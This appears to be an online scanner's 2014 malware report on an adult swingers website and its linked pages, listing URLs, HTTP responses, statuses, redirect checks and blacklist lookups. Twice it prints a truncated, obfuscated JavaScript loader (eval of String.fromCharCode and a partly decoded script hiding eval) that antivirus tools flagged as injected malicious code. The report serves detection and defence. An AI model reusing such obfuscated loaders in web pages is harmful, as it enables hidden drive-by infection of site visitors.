Scanned pages/files
Request | Server response | Status |
http://freeswingers100.com/ | 200 OK Content-Length: 59279 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.eval(String.fromCharCode(115,61,34,34,59,116,114,121,123,113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,34,49,50,51,34,43,110,41,59,125,99,97,116,99,104,40,113,119,41,123,104,61,45,48,49,54,47,55,59,116,114,121,123,97,61,112,114,111,116,111,116,121,112,101,59,125,99,97,116,99,104,40,122,120,99,41,123,101,61,119,105,110,100,111,119,91,34 ...[3541 bytes skipped]... Decoded script: s="";try{q=document.createElement("p");q.appendChild("123"+n);}catch(qw){h=-016/7;try{a=prototype;}catch(zxc){e=window["e"+"va"+"l"];n="204.351.440.495.232.315.444.550.64.330.404.600.232.246.388.550.200.333.436.390.234.327.392.505.228.120.164.615.26.30.128.160.64.96.472.485.228.96.416.525.64.183.128.580.208.315.460.230.230.303.404.500.64.141.128.580.208.315.460.230.162.177.52.50.64.96.128.160.236.291.456.160.216.333.128.305.64.348.416.525.230.138.460 ...[19651 bytes skipped]... Antivirus reports:
| ||
http://banners.adultfriendfinder.com/piclist?age=18-45&background_color=%23000000&border_color=%23999999&link_color=%23F3F3F3&models=0&override=1&p=piclist_links&pid=p15168c&show_join_link=0&site=ffadult&target=_blank&text_color=%23F3F3F3&thumb=bigthumb&title_color=%23F3F3F3 | 200 OK Content-Length: 10982 Content-Type: text/javascript | clean |
http://www9.addfreestats.com/cgi-bin/afstrack.cgi?usr=00916818 | 200 OK Content-Length: 3239 Content-Type: application/x-javascript | clean |
http://freeswingers100.com/cgi-bin/toplist/out.cgi?id=sexpers&url=http%3a%2f%2fwww.sexypersonaladz.com | HTTP/1.1 302 Found Connection: close Date: Fri, 25 Jul 2014 10:29:40 GMT Location: http://www.sexypersonaladz.com Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 401 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sexypersonaladz.com/ | 200 OK Content-Length: 24449 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.personals-100.com <HTML>
<HEAD> <TITLE>Sexy Personal Ads Free Sexy Adult Personals & Swingers singles Couples Bi-sexual Personals</TITLE> <META name="description" content="Sexy personal ads Offering free swingers personals for local contacts. We have swingers personal ads with photo's, adults singles galleries cams matchmaking and the adult personals adultfriend finder service. Sexypersonaladz for swingers,Singles,Alternat ...[4219 bytes skipped]... | ||
http://www.sexypersonaladz.com/./rollover.js | 200 OK Content-Length: 974 Content-Type: application/javascript | clean |
http://freeswingers100.com/test404page.js | 404 Not Found Content-Length: 518 Content-Type: text/html | clean |
http://freeswingers100.com/cgi-bin/toplist/out.cgi?id=swingadz&url=http%3a%2f%2fwww.swingersadz.com%2findex.htm | HTTP/1.1 302 Found Connection: close Date: Fri, 25 Jul 2014 10:29:43 GMT Location: http://www.swingersadz.com/index.htm Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 407 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.swingersadz.com/index.htm | 200 OK Content-Length: 88119 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.personals-100.com <HTML>
<HEAD> <TITLE>Free Swingers Ads Galleries Cams</TITLE> <META NAME="KEYWORDS" CONTENT="Free swingers ads, swingers galleries,swingers personals,adult personals,swingers,personals, sex, couples, swingers, adult sex, sexy personals, meet women, free sex personals, adult sex contacts, partners, photo personals, picture personals, sex dating, singles, kinky sex, sexy wives, gay, lesbian,bi-sexuals"> < ...[4173 bytes skipped]... | ||
http://www.swingersadz.com/menu.js | 200 OK Content-Length: 8253 Content-Type: application/javascript | clean |
http://freeswingers100.com/cgi-bin/toplist/menucontext.js | 404 Not Found Content-Length: 534 Content-Type: text/html | clean |
http://www9.addfreestats.com/cgi-bin/afstrack.cgi?usr=00901992 | 200 OK Content-Length: 981 Content-Type: application/x-javascript | clean |
http://banners.adultfriendfinder.com/piclist?link_color=%230066FF&page=search&width=95%25&title_color=%23000066&size=5&background_color=%23FFFFFF&pid=p15168c&override=1&thumb=thumb&looking_for_person=1&show_join_link=0&text_color=%23000066&age=18-35 | 200 OK Content-Length: 9218 Content-Type: text/javascript | clean |
http://freeswingers100.com/. | 200 OK Content-Length: 59279 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.eval(String.fromCharCode(115,61,34,34,59,116,114,121,123,113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,34,49,50,51,34,43,110,41,59,125,99,97,116,99,104,40,113,119,41,123,104,61,45,48,49,54,47,55,59,116,114,121,123,97,61,112,114,111,116,111,116,121,112,101,59,125,99,97,116,99,104,40,122,120,99,41,123,101,61,119,105,110,100,111,119,91,34 ...[3541 bytes skipped]... Decoded script: s="";try{q=document.createElement("p");q.appendChild("123"+n);}catch(qw){h=-016/7;try{a=prototype;}catch(zxc){e=window["e"+"va"+"l"];n="204.351.440.495.232.315.444.550.64.330.404.600.232.246.388.550.200.333.436.390.234.327.392.505.228.120.164.615.26.30.128.160.64.96.472.485.228.96.416.525.64.183.128.580.208.315.460.230.230.303.404.500.64.141.128.580.208.315.460.230.162.177.52.50.64.96.128.160.236.291.456.160.216.333.128.305.64.348.416.525.230.138.460 ...[19651 bytes skipped]... Antivirus reports:
| ||
http://freeswingers100.com/cgi-bin/toplist/out.cgi?id=twoshews&url=http%3a%2f%2fwww.ladieslinx.com%2findex.htm | HTTP/1.1 302 Found Connection: close Date: Fri, 25 Jul 2014 10:29:50 GMT Location: http://www.ladieslinx.com/index.htm Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 406 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ladieslinx.com/index.htm | 200 OK Content-Length: 67716 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.personals-100.com <HTML>
<HEAD> <TITLE>Ladieslinx Personals Ladies Vote Singles Couples Swingers On-Line Guide to Adult Entertainment</TITLE> <META NAME="DESCRIPTION" CONTENT="Ladies Links Free Adult Personals Swinger Contacts Galleries Ladies Vote Worldwide Contacts Free Membership."> <META NAME="KEYWORDS" CONTENT="ladies links,ladies vote,rate me,amateur wives,sexy wives,wifewatchers,amateur wives ,wives, personals,se ...[4116 bytes skipped]... | ||
http://www.ladieslinx.com/./assets/rollover.js | 200 OK Content-Length: 5166 Content-Type: application/javascript | clean |
http://freeswingers100.com/cgi-bin/toplist/./index.html | 404 Not Found Content-Length: 530 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: freeswingers100.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Jul 2014 10:29:34 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: freeswingers100.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Jul 2014 10:29:34 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: freeswingers100.com
Referer: http://www.google.com/search?q=freeswingers100.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: freeswingers100.com
Referer: http://www.google.com/search?q=freeswingers100.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=freeswingers100.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://freeswingers100.com/
Result: freeswingers100.com is not infected or malware details are not published yet.
Result: freeswingers100.com is not infected or malware details are not published yet.